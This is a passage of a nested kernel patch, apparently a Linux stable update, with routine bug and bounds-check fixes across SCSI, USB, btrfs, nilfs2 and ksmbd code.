++	FNIC_SCSI_DBG(KERN_INFO, fnic->lport->host,
++			"%s: exit status: %d\n", __func__, ret);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index ecff2ec83a002..c4f293d39f228 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -31,6 +31,7 @@ static void qedf_remove(struct pci_dev *pdev);
+ static void qedf_shutdown(struct pci_dev *pdev);
+ static void qedf_schedule_recovery_handler(void *dev);
+ static void qedf_recovery_handler(struct work_struct *work);
++static int qedf_suspend(struct pci_dev *pdev, pm_message_t state);
+ 
+ /*
+  * Driver module parameters.
+@@ -3276,6 +3277,7 @@ static struct pci_driver qedf_pci_driver = {
+ 	.probe = qedf_probe,
+ 	.remove = qedf_remove,
+ 	.shutdown = qedf_shutdown,
++	.suspend = qedf_suspend,
+ };
+ 
+ static int __qedf_probe(struct pci_dev *pdev, int mode)
+@@ -4005,6 +4007,22 @@ static void qedf_shutdown(struct pci_dev *pdev)
+ 	__qedf_remove(pdev, QEDF_MODE_NORMAL);
+ }
+ 
++static int qedf_suspend(struct pci_dev *pdev, pm_message_t state)
++{
++	struct qedf_ctx *qedf;
++
++	if (!pdev) {
++		QEDF_ERR(NULL, "pdev is NULL.\n");
++		return -ENODEV;
++	}
++
++	qedf = pci_get_drvdata(pdev);
++
++	QEDF_ERR(&qedf->dbg_ctx, "%s: Device does not support suspend operation\n", __func__);
++
++	return -EPERM;
++}
++
+ /*
+  * Recovery handler code
+  */
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index f530bb0364939..9fd68d362698f 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -69,6 +69,7 @@ static struct nvm_iscsi_block *qedi_get_nvram_block(struct qedi_ctx *qedi);
+ static void qedi_recovery_handler(struct work_struct *work);
+ static void qedi_schedule_hw_err_handler(void *dev,
+ 					 enum qed_hw_err_type err_type);
++static int qedi_suspend(struct pci_dev *pdev, pm_message_t state);
+ 
+ static int qedi_iscsi_event_cb(void *context, u8 fw_event_code, void *fw_handle)
+ {
+@@ -2510,6 +2511,22 @@ static void qedi_shutdown(struct pci_dev *pdev)
+ 	__qedi_remove(pdev, QEDI_MODE_SHUTDOWN);
+ }
+ 
++static int qedi_suspend(struct pci_dev *pdev, pm_message_t state)
++{
++	struct qedi_ctx *qedi;
++
++	if (!pdev) {
++		QEDI_ERR(NULL, "pdev is NULL.\n");
++		return -ENODEV;
++	}
++
++	qedi = pci_get_drvdata(pdev);
++
++	QEDI_ERR(&qedi->dbg_ctx, "%s: Device does not support suspend operation\n", __func__);
++
++	return -EPERM;
++}
++
+ static int __qedi_probe(struct pci_dev *pdev, int mode)
+ {
+ 	struct qedi_ctx *qedi;
+@@ -2868,6 +2885,7 @@ static struct pci_driver qedi_pci_driver = {
+ 	.remove = qedi_remove,
+ 	.shutdown = qedi_shutdown,
+ 	.err_handler = &qedi_err_handler,
++	.suspend = qedi_suspend,
+ };
+ 
+ static int __init qedi_init(void)
+diff --git a/drivers/scsi/raid_class.c b/drivers/scsi/raid_class.c
+index 898a0bdf8df67..711252e52d8e1 100644
+--- a/drivers/scsi/raid_class.c
++++ b/drivers/scsi/raid_class.c
+@@ -248,6 +248,7 @@ int raid_component_add(struct raid_template *r,struct device *raid_dev,
+ 	return 0;
+ 
+ err_out:
++	put_device(&rc->dev);
+ 	list_del(&rc->node);
+ 	rd->component_count--;
+ 	put_device(component_dev);
+diff --git a/drivers/scsi/scsi_proc.c b/drivers/scsi/scsi_proc.c
+index 95aee1ad13834..7184e169a4a51 100644
+--- a/drivers/scsi/scsi_proc.c
++++ b/drivers/scsi/scsi_proc.c
+@@ -311,7 +311,7 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 			       size_t length, loff_t *ppos)
+ {
+ 	int host, channel, id, lun;
+-	char *buffer, *p;
++	char *buffer, *end, *p;
+ 	int err;
+ 
+ 	if (!buf || length > PAGE_SIZE)
+@@ -326,10 +326,14 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 		goto out;
+ 
+ 	err = -EINVAL;
+-	if (length < PAGE_SIZE)
+-		buffer[length] = '\0';
+-	else if (buffer[PAGE_SIZE-1])
+-		goto out;
++	if (length < PAGE_SIZE) {
++		end = buffer + length;
++		*end = '\0';
++	} else {
++		end = buffer + PAGE_SIZE - 1;
++		if (*end)
++			goto out;
++	}
+ 
+ 	/*
+ 	 * Usage: echo "scsi add-single-device 0 1 2 3" >/proc/scsi/scsi
+@@ -338,10 +342,10 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 	if (!strncmp("scsi add-single-device", buffer, 22)) {
+ 		p = buffer + 23;
+ 
+-		host = simple_strtoul(p, &p, 0);
+-		channel = simple_strtoul(p + 1, &p, 0);
+-		id = simple_strtoul(p + 1, &p, 0);
+-		lun = simple_strtoul(p + 1, &p, 0);
++		host    = (p     < end) ? simple_strtoul(p, &p, 0) : 0;
++		channel = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		id      = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		lun     = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
+ 
+ 		err = scsi_add_single_device(host, channel, id, lun);
+ 
+@@ -352,10 +356,10 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 	} else if (!strncmp("scsi remove-single-device", buffer, 25)) {
+ 		p = buffer + 26;
+ 
+-		host = simple_strtoul(p, &p, 0);
+-		channel = simple_strtoul(p + 1, &p, 0);
+-		id = simple_strtoul(p + 1, &p, 0);
+-		lun = simple_strtoul(p + 1, &p, 0);
++		host    = (p     < end) ? simple_strtoul(p, &p, 0) : 0;
++		channel = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		id      = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		lun     = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
+ 
+ 		err = scsi_remove_single_device(host, channel, id, lun);
+ 	}
+diff --git a/drivers/scsi/snic/snic_disc.c b/drivers/scsi/snic/snic_disc.c
+index 8fbf3c1b1311d..cd27562ec922e 100644
+--- a/drivers/scsi/snic/snic_disc.c
++++ b/drivers/scsi/snic/snic_disc.c
+@@ -303,6 +303,7 @@ snic_tgt_create(struct snic *snic, struct snic_tgt_id *tgtid)
+ 			      "Snic Tgt: device_add, with err = %d\n",
+ 			      ret);
+ 
++		put_device(&tgt->dev);
+ 		put_device(&snic->shost->shost_gendev);
+ 		spin_lock_irqsave(snic->shost->host_lock, flags);
+ 		list_del(&tgt->list);
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 54a1b8514f04b..83d09c2009280 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1670,10 +1670,6 @@ static int storvsc_host_reset_handler(struct scsi_cmnd *scmnd)
+  */
+ static enum blk_eh_timer_return storvsc_eh_timed_out(struct scsi_cmnd *scmnd)
+ {
+-#if IS_ENABLED(CONFIG_SCSI_FC_ATTRS)
+-	if (scmnd->device->host->transportt == fc_transport_template)
+-		return fc_eh_timed_out(scmnd);
+-#endif
+ 	return BLK_EH_RESET_TIMER;
+ }
+ 
+diff --git a/drivers/ufs/host/ufs-renesas.c b/drivers/ufs/host/ufs-renesas.c
+index f8a5e79ed3b4e..ab0652d8705ac 100644
+--- a/drivers/ufs/host/ufs-renesas.c
++++ b/drivers/ufs/host/ufs-renesas.c
+@@ -359,7 +359,7 @@ static int ufs_renesas_init(struct ufs_hba *hba)
+ {
+ 	struct ufs_renesas_priv *priv;
+ 
+-	priv = devm_kmalloc(hba->dev, sizeof(*priv), GFP_KERNEL);
++	priv = devm_kzalloc(hba->dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+ 	ufshcd_set_variant(hba, priv);
+diff --git a/drivers/usb/common/usb-conn-gpio.c b/drivers/usb/common/usb-conn-gpio.c
+index e20874caba363..3f5180d64931b 100644
+--- a/drivers/usb/common/usb-conn-gpio.c
++++ b/drivers/usb/common/usb-conn-gpio.c
+@@ -42,6 +42,7 @@ struct usb_conn_info {
+ 
+ 	struct power_supply_desc desc;
+ 	struct power_supply *charger;
++	bool initial_detection;
+ };
+ 
+ /*
+@@ -86,11 +87,13 @@ static void usb_conn_detect_cable(struct work_struct *work)
+ 	dev_dbg(info->dev, "role %s -> %s, gpios: id %d, vbus %d\n",
+ 		usb_role_string(info->last_role), usb_role_string(role), id, vbus);
+ 
+-	if (info->last_role == role) {
++	if (!info->initial_detection && info->last_role == role) {
+ 		dev_warn(info->dev, "repeated role: %s\n", usb_role_string(role));
+ 		return;
+ 	}
+ 
++	info->initial_detection = false;
++
+ 	if (info->last_role == USB_ROLE_HOST && info->vbus)
+ 		regulator_disable(info->vbus);
+ 
+@@ -258,6 +261,7 @@ static int usb_conn_probe(struct platform_device *pdev)
+ 	device_set_wakeup_capable(&pdev->dev, true);
+ 
+ 	/* Perform initial detection */
++	info->initial_detection = true;
+ 	usb_conn_queue_dwork(info, 0);
+ 
+ 	return 0;
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index c3590a0c42035..137602d9076fd 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -4342,9 +4342,14 @@ static irqreturn_t dwc3_check_event_buf(struct dwc3_event_buffer *evt)
+ 	u32 count;
+ 
+ 	if (pm_runtime_suspended(dwc->dev)) {
++		dwc->pending_events = true;
++		/*
++		 * Trigger runtime resume. The get() function will be balanced
++		 * after processing the pending events in dwc3_process_pending
++		 * events().
++		 */
+ 		pm_runtime_get(dwc->dev);
+ 		disable_irq_nosync(dwc->irq_gadget);
+-		dwc->pending_events = true;
+ 		return IRQ_HANDLED;
+ 	}
+ 
+@@ -4609,6 +4614,8 @@ void dwc3_gadget_process_pending_events(struct dwc3 *dwc)
+ {
+ 	if (dwc->pending_events) {
+ 		dwc3_interrupt(dwc->irq_gadget, dwc->ev_buf);
++		dwc3_thread_interrupt(dwc->irq_gadget, dwc->ev_buf);
++		pm_runtime_put(dwc->dev);
+ 		dwc->pending_events = false;
+ 		enable_irq(dwc->irq_gadget);
+ 	}
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 139f471894fb5..316e9cc3987be 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -795,6 +795,9 @@ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+  * usb_gadget_activate() is called.  For example, user mode components may
+  * need to be activated before the system can talk to hosts.
+  *
++ * This routine may sleep; it must not be called in interrupt context
++ * (such as from within a gadget driver's disconnect() callback).
++ *
+  * Returns zero on success, else negative errno.
+  */
+ int usb_gadget_deactivate(struct usb_gadget *gadget)
+@@ -833,6 +836,8 @@ EXPORT_SYMBOL_GPL(usb_gadget_deactivate);
+  * This routine activates gadget which was previously deactivated with
+  * usb_gadget_deactivate() call. It calls usb_gadget_connect() if needed.
+  *
++ * This routine may sleep; it must not be called in interrupt context.
++ *
+  * Returns zero on success, else negative errno.
+  */
+ int usb_gadget_activate(struct usb_gadget *gadget)
+@@ -1611,7 +1616,11 @@ static void gadget_unbind_driver(struct device *dev)
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
++	mutex_unlock(&udc->connect_lock);
++
+ 	udc->driver->unbind(gadget);
++
++	mutex_lock(&udc->connect_lock);
+ 	usb_gadget_udc_stop_locked(udc);
+ 	mutex_unlock(&udc->connect_lock);
+ 
+diff --git a/drivers/usb/storage/alauda.c b/drivers/usb/storage/alauda.c
+index 5e912dd29b4c9..115f05a6201a1 100644
+--- a/drivers/usb/storage/alauda.c
++++ b/drivers/usb/storage/alauda.c
+@@ -318,7 +318,8 @@ static int alauda_get_media_status(struct us_data *us, unsigned char *data)
+ 	rc = usb_stor_ctrl_transfer(us, us->recv_ctrl_pipe,
+ 		command, 0xc0, 0, 1, data, 2);
+ 
+-	usb_stor_dbg(us, "Media status %02X %02X\n", data[0], data[1]);
++	if (rc == USB_STOR_XFER_GOOD)
++		usb_stor_dbg(us, "Media status %02X %02X\n", data[0], data[1]);
+ 
+ 	return rc;
+ }
+@@ -454,9 +455,14 @@ static int alauda_init_media(struct us_data *us)
+ static int alauda_check_media(struct us_data *us)
+ {
+ 	struct alauda_info *info = (struct alauda_info *) us->extra;
+-	unsigned char status[2];
++	unsigned char *status = us->iobuf;
++	int rc;
+ 
+-	alauda_get_media_status(us, status);
++	rc = alauda_get_media_status(us, status);
++	if (rc != USB_STOR_XFER_GOOD) {
++		status[0] = 0xF0;	/* Pretend there's no media */
++		status[1] = 0;
++	}
+ 
+ 	/* Check for no media or door open */
+ 	if ((status[0] & 0x80) || ((status[0] & 0x1F) == 0x10)
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 7cdf83f4c811b..7a3caf556dae9 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -60,6 +60,7 @@ struct dp_altmode {
+ 
+ 	enum dp_state state;
+ 	bool hpd;
++	bool pending_hpd;
+ 
+ 	struct mutex lock; /* device lock */
+ 	struct work_struct work;
+@@ -144,8 +145,13 @@ static int dp_altmode_status_update(struct dp_altmode *dp)
+ 		dp->state = DP_STATE_EXIT;
+ 	} else if (!(con & DP_CONF_CURRENTLY(dp->data.conf))) {
+ 		ret = dp_altmode_configure(dp, con);
+-		if (!ret)
++		if (!ret) {
+ 			dp->state = DP_STATE_CONFIGURE;
++			if (dp->hpd != hpd) {
++				dp->hpd = hpd;
++				dp->pending_hpd = true;
++			}
++		}
+ 	} else {
+ 		if (dp->hpd != hpd) {
+ 			drm_connector_oob_hotplug_event(dp->connector_fwnode);
+@@ -160,6 +166,16 @@ static int dp_altmode_configured(struct dp_altmode *dp)
+ {
+ 	sysfs_notify(&dp->alt->dev.kobj, "displayport", "configuration");
+ 	sysfs_notify(&dp->alt->dev.kobj, "displayport", "pin_assignment");
++	/*
++	 * If the DFP_D/UFP_D sends a change in HPD when first notifying the
++	 * DisplayPort driver that it is connected, then we wait until
++	 * configuration is complete to signal HPD.
++	 */
++	if (dp->pending_hpd) {
++		drm_connector_oob_hotplug_event(dp->connector_fwnode);
++		sysfs_notify(&dp->alt->dev.kobj, "displayport", "hpd");
++		dp->pending_hpd = false;
++	}
+ 
+ 	return dp_altmode_notify(dp);
+ }
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 524099634a1d4..d5950ef9d1f35 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -5322,6 +5322,10 @@ static void _tcpm_pd_vbus_off(struct tcpm_port *port)
+ 		/* Do nothing, vbus drop expected */
+ 		break;
+ 
++	case SNK_HARD_RESET_WAIT_VBUS:
++		/* Do nothing, its OK to receive vbus off events */
++		break;
++
+ 	default:
+ 		if (port->pwr_role == TYPEC_SINK && port->attached)
+ 			tcpm_set_state(port, SNK_UNATTACHED, tcpm_wait_for_discharge(port));
+@@ -5368,6 +5372,9 @@ static void _tcpm_pd_vbus_vsafe0v(struct tcpm_port *port)
+ 	case SNK_DEBOUNCED:
+ 		/*Do nothing, still waiting for VSAFE5V for connect */
+ 		break;
++	case SNK_HARD_RESET_WAIT_VBUS:
++		/* Do nothing, its OK to receive vbus off events */
++		break;
+ 	default:
+ 		if (port->pwr_role == TYPEC_SINK && port->auto_vbus_discharge_enabled)
+ 			tcpm_set_state(port, SNK_UNATTACHED, 0);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index d7aad5e8ee377..3495bc775afa3 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -436,13 +436,23 @@ void btrfs_wait_block_group_cache_progress(struct btrfs_block_group *cache,
+ 					   u64 num_bytes)
+ {
+ 	struct btrfs_caching_control *caching_ctl;
++	int progress;
+ 
+ 	caching_ctl = btrfs_get_caching_control(cache);
+ 	if (!caching_ctl)
+ 		return;
+ 
++	/*
++	 * We've already failed to allocate from this block group, so even if
++	 * there's enough space in the block group it isn't contiguous enough to
++	 * allow for an allocation, so wait for at least the next wakeup tick,
++	 * or for the thing to be done.
++	 */
++	progress = atomic_read(&caching_ctl->progress);
++
+ 	wait_event(caching_ctl->wait, btrfs_block_group_done(cache) ||
+-		   (cache->free_space_ctl->free_space >= num_bytes));
++		   (progress != atomic_read(&caching_ctl->progress) &&
++		    (cache->free_space_ctl->free_space >= num_bytes)));
+ 
+ 	btrfs_put_caching_control(caching_ctl);
+ }
+@@ -660,8 +670,10 @@ next:
+ 
+ 			if (total_found > CACHING_CTL_WAKE_UP) {
+ 				total_found = 0;
+-				if (wakeup)
++				if (wakeup) {
++					atomic_inc(&caching_ctl->progress);
+ 					wake_up(&caching_ctl->wait);
++				}
+ 			}
+ 		}
+ 		path->slots[0]++;
+@@ -767,6 +779,7 @@ int btrfs_cache_block_group(struct btrfs_block_group *cache, bool wait)
+ 	init_waitqueue_head(&caching_ctl->wait);
+ 	caching_ctl->block_group = cache;
+ 	refcount_set(&caching_ctl->count, 2);
++	atomic_set(&caching_ctl->progress, 0);
+ 	btrfs_init_work(&caching_ctl->work, caching_thread, NULL, NULL);
+ 
+ 	spin_lock(&cache->lock);
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index 0a3d386823583..debd42aeae0f1 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -70,6 +70,8 @@ struct btrfs_caching_control {
+ 	wait_queue_head_t wait;
+ 	struct btrfs_work work;
+ 	struct btrfs_block_group *block_group;
++	/* Track progress of caching during allocation. */
++	atomic_t progress;
+ 	refcount_t count;
+ };
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index f22e00dfec6c4..96369c44863a1 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1455,7 +1455,8 @@ static int btrfs_init_fs_root(struct btrfs_root *root, dev_t anon_dev)
+ 		goto fail;
+ 
+ 	if (root->root_key.objectid != BTRFS_TREE_LOG_OBJECTID &&
+-	    !btrfs_is_data_reloc_root(root)) {
++	    !btrfs_is_data_reloc_root(root) &&
++	    is_fstree(root->root_key.objectid)) {
+ 		set_bit(BTRFS_ROOT_SHAREABLE, &root->state);
+ 		btrfs_check_and_init_root_item(&root->root_item);
+ 	}
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 571fcc5ae4dcf..f2ee70c03f0d5 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -4411,8 +4411,11 @@ have_block_group:
+ 			ret = 0;
+ 		}
+ 
+-		if (unlikely(block_group->cached == BTRFS_CACHE_ERROR))
++		if (unlikely(block_group->cached == BTRFS_CACHE_ERROR)) {
++			if (!cache_block_group_error)
++				cache_block_group_error = -EIO;
+ 			goto loop;
++		}
+ 
+ 		bg_ret = NULL;
+ 		ret = do_allocation(block_group, ffe_ctl, &bg_ret);
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 58785dc7080ad..0ad69041954ff 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -3015,11 +3015,12 @@ retry:
+ 			}
+ 
+ 			/*
+-			 * the filesystem may choose to bump up nr_to_write.
++			 * The filesystem may choose to bump up nr_to_write.
+ 			 * We have to make sure to honor the new nr_to_write
+-			 * at any time
++			 * at any time.
+ 			 */
+-			nr_to_write_done = wbc->nr_to_write <= 0;
++			nr_to_write_done = (wbc->sync_mode == WB_SYNC_NONE &&
++					    wbc->nr_to_write <= 0);
+ 		}
+ 		pagevec_release(&pvec);
+ 		cond_resched();
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 3c48273cd7a5a..28bcba2e05908 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -1429,8 +1429,6 @@ out_unlock:
+ 					     clear_bits,
+ 					     page_ops);
+ 		start += cur_alloc_size;
+-		if (start >= end)
+-			return ret;
+ 	}
+ 
+ 	/*
+@@ -1439,9 +1437,11 @@ out_unlock:
+ 	 * space_info's bytes_may_use counter, reserved in
+ 	 * btrfs_check_data_free_space().
+ 	 */
+-	extent_clear_unlock_delalloc(inode, start, end, locked_page,
+-				     clear_bits | EXTENT_CLEAR_DATA_RESV,
+-				     page_ops);
++	if (start < end) {
++		clear_bits |= EXTENT_CLEAR_DATA_RESV;
++		extent_clear_unlock_delalloc(inode, start, end, locked_page,
++					     clear_bits, page_ops);
++	}
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/relocation.c b/fs/btrfs/relocation.c
+index 666a37a0ee897..d3591c7f166ad 100644
+--- a/fs/btrfs/relocation.c
++++ b/fs/btrfs/relocation.c
+@@ -1902,7 +1902,39 @@ again:
+ 				err = PTR_ERR(root);
+ 			break;
+ 		}
+-		ASSERT(root->reloc_root == reloc_root);
++
++		if (unlikely(root->reloc_root != reloc_root)) {
++			if (root->reloc_root) {
++				btrfs_err(fs_info,
++"reloc tree mismatch, root %lld has reloc root key (%lld %u %llu) gen %llu, expect reloc root key (%lld %u %llu) gen %llu",
++					  root->root_key.objectid,
++					  root->reloc_root->root_key.objectid,
++					  root->reloc_root->root_key.type,
++					  root->reloc_root->root_key.offset,
++					  btrfs_root_generation(
++						  &root->reloc_root->root_item),
++					  reloc_root->root_key.objectid,
++					  reloc_root->root_key.type,
++					  reloc_root->root_key.offset,
++					  btrfs_root_generation(
++						  &reloc_root->root_item));
++			} else {
++				btrfs_err(fs_info,
++"reloc tree mismatch, root %lld has no reloc root, expect reloc root key (%lld %u %llu) gen %llu",
++					  root->root_key.objectid,
++					  reloc_root->root_key.objectid,
++					  reloc_root->root_key.type,
++					  reloc_root->root_key.offset,
++					  btrfs_root_generation(
++						  &reloc_root->root_item));
++			}
++			list_add(&reloc_root->root_list, &reloc_roots);
++			btrfs_put_root(root);
++			btrfs_abort_transaction(trans, -EUCLEAN);
++			if (!err)
++				err = -EUCLEAN;
++			break;
++		}
+ 
+ 		/*
+ 		 * set reference count to 1, so btrfs_recover_relocation
+@@ -1975,7 +2007,7 @@ again:
+ 		root = btrfs_get_fs_root(fs_info, reloc_root->root_key.offset,
+ 					 false);
+ 		if (btrfs_root_refs(&reloc_root->root_item) > 0) {
+-			if (IS_ERR(root)) {
++			if (WARN_ON(IS_ERR(root))) {
+ 				/*
+ 				 * For recovery we read the fs roots on mount,
+ 				 * and if we didn't find the root then we marked
+@@ -1984,17 +2016,14 @@ again:
+ 				 * memory.  However there's no reason we can't
+ 				 * handle the error properly here just in case.
+ 				 */
+-				ASSERT(0);
+ 				ret = PTR_ERR(root);
+ 				goto out;
+ 			}
+-			if (root->reloc_root != reloc_root) {
++			if (WARN_ON(root->reloc_root != reloc_root)) {
+ 				/*
+-				 * This is actually impossible without something
+-				 * going really wrong (like weird race condition
+-				 * or cosmic rays).
++				 * This can happen if on-disk metadata has some
++				 * corruption, e.g. bad reloc tree key offset.
+ 				 */
+-				ASSERT(0);
+ 				ret = -EINVAL;
+ 				goto out;
+ 			}
+diff --git a/fs/btrfs/tree-checker.c b/fs/btrfs/tree-checker.c
+index 43f905ab0a18d..2b39c7f9226fe 100644
+--- a/fs/btrfs/tree-checker.c
++++ b/fs/btrfs/tree-checker.c
+@@ -442,6 +442,20 @@ static int check_root_key(struct extent_buffer *leaf, struct btrfs_key *key,
+ 	btrfs_item_key_to_cpu(leaf, &item_key, slot);
+ 	is_root_item = (item_key.type == BTRFS_ROOT_ITEM_KEY);
+ 
++	/*
++	 * Bad rootid for reloc trees.
++	 *
++	 * Reloc trees are only for subvolume trees, other trees only need
++	 * to be COWed to be relocated.
++	 */
++	if (unlikely(is_root_item && key->objectid == BTRFS_TREE_RELOC_OBJECTID &&
++		     !is_fstree(key->offset))) {
++		generic_err(leaf, slot,
++		"invalid reloc tree for root %lld, root id is not a subvolume tree",
++			    key->offset);
++		return -EUCLEAN;
++	}
++
+ 	/* No such tree id */
+ 	if (unlikely(key->objectid == 0)) {
+ 		if (is_root_item)
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index f6e44efb58e15..d4c0895a88116 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -1101,9 +1101,17 @@ int nilfs_set_file_dirty(struct inode *inode, unsigned int nr_dirty)
+ 
+ int __nilfs_mark_inode_dirty(struct inode *inode, int flags)
+ {
++	struct the_nilfs *nilfs = inode->i_sb->s_fs_info;
+ 	struct buffer_head *ibh;
+ 	int err;
+ 
++	/*
++	 * Do not dirty inodes after the log writer has been detached
++	 * and its nilfs_root struct has been freed.
++	 */
++	if (unlikely(nilfs_purging(nilfs)))
++		return 0;
++
+ 	err = nilfs_load_inode_block(inode, &ibh);
+ 	if (unlikely(err)) {
+ 		nilfs_warn(inode->i_sb,
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 6cf64023be31e..21e8260112c8f 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2843,6 +2843,7 @@ void nilfs_detach_log_writer(struct super_block *sb)
+ 		nilfs_segctor_destroy(nilfs->ns_writer);
+ 		nilfs->ns_writer = NULL;
+ 	}
++	set_nilfs_purging(nilfs);
+ 
+ 	/* Force to free the list of dirty files */
+ 	spin_lock(&nilfs->ns_inode_lock);
+@@ -2855,4 +2856,5 @@ void nilfs_detach_log_writer(struct super_block *sb)
+ 	up_write(&nilfs->ns_segctor_sem);
+ 
+ 	nilfs_dispose_list(nilfs, &garbage_list, 1);
++	clear_nilfs_purging(nilfs);
+ }
+diff --git a/fs/nilfs2/the_nilfs.h b/fs/nilfs2/the_nilfs.h
+index 47c7dfbb7ea58..cd4ae1b8ae165 100644
+--- a/fs/nilfs2/the_nilfs.h
++++ b/fs/nilfs2/the_nilfs.h
+@@ -29,6 +29,7 @@ enum {
+ 	THE_NILFS_DISCONTINUED,	/* 'next' pointer chain has broken */
+ 	THE_NILFS_GC_RUNNING,	/* gc process is running */
+ 	THE_NILFS_SB_DIRTY,	/* super block is dirty */
++	THE_NILFS_PURGING,	/* disposing dirty files for cleanup */
+ };
+ 
+ /**
+@@ -208,6 +209,7 @@ THE_NILFS_FNS(INIT, init)
+ THE_NILFS_FNS(DISCONTINUED, discontinued)
+ THE_NILFS_FNS(GC_RUNNING, gc_running)
+ THE_NILFS_FNS(SB_DIRTY, sb_dirty)
++THE_NILFS_FNS(PURGING, purging)
+ 
+ /*
+  * Mount option operations
+diff --git a/fs/smb/server/smb2misc.c b/fs/smb/server/smb2misc.c
+index 33b7e6c4ceffb..e881df1d10cbd 100644
+--- a/fs/smb/server/smb2misc.c
++++ b/fs/smb/server/smb2misc.c
+@@ -380,13 +380,13 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 	}
+ 
+ 	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
+-		if (command == SMB2_OPLOCK_BREAK_HE &&
+-		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_20 &&
+-		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_21) {
++		if (!(command == SMB2_OPLOCK_BREAK_HE &&
++		    (le16_to_cpu(pdu->StructureSize2) == OP_BREAK_STRUCT_SIZE_20 ||
++		    le16_to_cpu(pdu->StructureSize2) == OP_BREAK_STRUCT_SIZE_21))) {
+ 			/* special case for SMB2.1 lease break message */
+ 			ksmbd_debug(SMB,
+-				    "Illegal request size %d for oplock break\n",
+-				    le16_to_cpu(pdu->StructureSize2));
++				"Illegal request size %u for command %d\n",
++				le16_to_cpu(pdu->StructureSize2), command);
+ 			return 1;
+ 		}
+ 	}
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 26cf73d664f94..f8ca44622d909 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2340,9 +2340,16 @@ next:
+ 			break;
+ 		buf_len -= next;
+ 		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
+-		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
++		if (buf_len < sizeof(struct smb2_ea_info)) {
++			rc = -EINVAL;
+ 			break;
++		}
+ 
++		if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
++				le16_to_cpu(eabuf->EaValueLength)) {
++			rc = -EINVAL;
++			break;
++		}
+ 	} while (next != 0);
+ 
+ 	kfree(attr_name);
+diff --git a/include/linux/cpu.h b/include/linux/cpu.h
+index f98cfe9f188f5..008bfa68cfabc 100644
+--- a/include/linux/cpu.h
++++ b/include/linux/cpu.h
+@@ -72,6 +72,8 @@ extern ssize_t cpu_show_retbleed(struct device *dev,
+ 				 struct device_attribute *attr, char *buf);
+ extern ssize_t cpu_show_spec_rstack_overflow(struct device *dev,
+ 					     struct device_attribute *attr, char *buf);
++extern ssize_t cpu_show_gds(struct device *dev,
++			    struct device_attribute *attr, char *buf);
+ 
+ extern __printf(4, 5)
